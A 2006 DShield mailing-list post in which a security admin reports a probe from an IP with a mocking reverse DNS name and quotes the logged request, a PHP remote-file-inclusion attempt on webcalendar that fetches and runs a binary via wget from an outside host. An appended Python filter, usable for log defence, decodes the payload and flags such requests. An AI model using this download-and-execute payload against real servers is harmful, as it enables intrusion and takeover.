[Dshield] Reverse name

DigitalNation dshield at digitalnation.ca
Sat Mar 18 05:48:02 GMT 2006


Check out the RV DNS name of this IP (64.62.190.68) that is probing for a
PHP cross scripting hack:

64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com

Here is some of the script so you won't think I am BS'ing you:

---------------------------------------------------
HTTP_PHP_Includedir, 64.62.190.68,
64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com, 64.x.x.x, ,
URL=/webcalendar/send_reminders.php&arg=includedir%3Dhttp://83.16.187.6/cmd.
dat?%26cmd%3Dcd%2520/tmp;wget%252083.16.187.6/haita;chmod%2520744%2520haita;
./haita;echo%.....
----------------------------------------------------

Ha!! Nice...."torabora.bin-Iaden.com"

These guys really want to be liked, don't you think?

------------------
M. McBride
Security Admin
DigitalNation
Vancouver, Canada
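
Added example, not part of the original post: the logged request sets an `includedir` parameter to a remote URL and carries its shell command under two layers of percent-encoding, so a log filter has to decode repeatedly before matching. The function names, regexes and round cap below are assumptions chosen for illustration; the sample input is the URL field from the excerpt above with the e-mail line wraps joined.

```python
import re
from urllib.parse import unquote

# URL field from the log excerpt in the post, e-mail line wraps joined.
# The trailing "echo%....." truncation is kept exactly as posted.
SAMPLE_URL = (
    "/webcalendar/send_reminders.php&arg=includedir%3Dhttp://83.16.187.6/cmd."
    "dat?%26cmd%3Dcd%2520/tmp;wget%252083.16.187.6/haita;chmod%2520744%2520haita;"
    "./haita;echo%....."
)

MAX_ROUNDS = 5  # assumption: cap on nested percent-encoding layers to peel

# A parameter whose value is a remote URL, e.g. includedir=http://host/...
REMOTE_PARAM = re.compile(r"([A-Za-z_][\w\[\]]*)=((?:https?|ftp)://[^\s&;]+)", re.I)
# Download-and-run tooling that has no place in a calendar request.
SHELL_TOKENS = re.compile(r"\b(wget|curl|chmod)\b", re.I)


def decode_layers(raw, max_rounds=MAX_ROUNDS):
    """Percent-decode until the string stops changing; return (text, rounds)."""
    text, rounds = raw, 0
    while rounds < max_rounds:
        decoded = unquote(text)  # invalid escapes such as "%.." are left as-is
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds


def analyze(raw_url):
    """Return the indicators a reviewer would want from one logged URL."""
    text, rounds = decode_layers(raw_url)
    remote = [(m.group(1), m.group(2)) for m in REMOTE_PARAM.finditer(text)]
    return {
        "decoded": text,
        "encoding_layers": rounds,
        "remote_params": remote,
        "shell_tokens": sorted({t.lower() for t in SHELL_TOKENS.findall(text)}),
        "flag": bool(remote),  # any parameter pointing at a remote URL
    }
```

Matching only the raw log line would miss `wget` followed by a space, because the space is still `%2520` until the second decode round.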
 




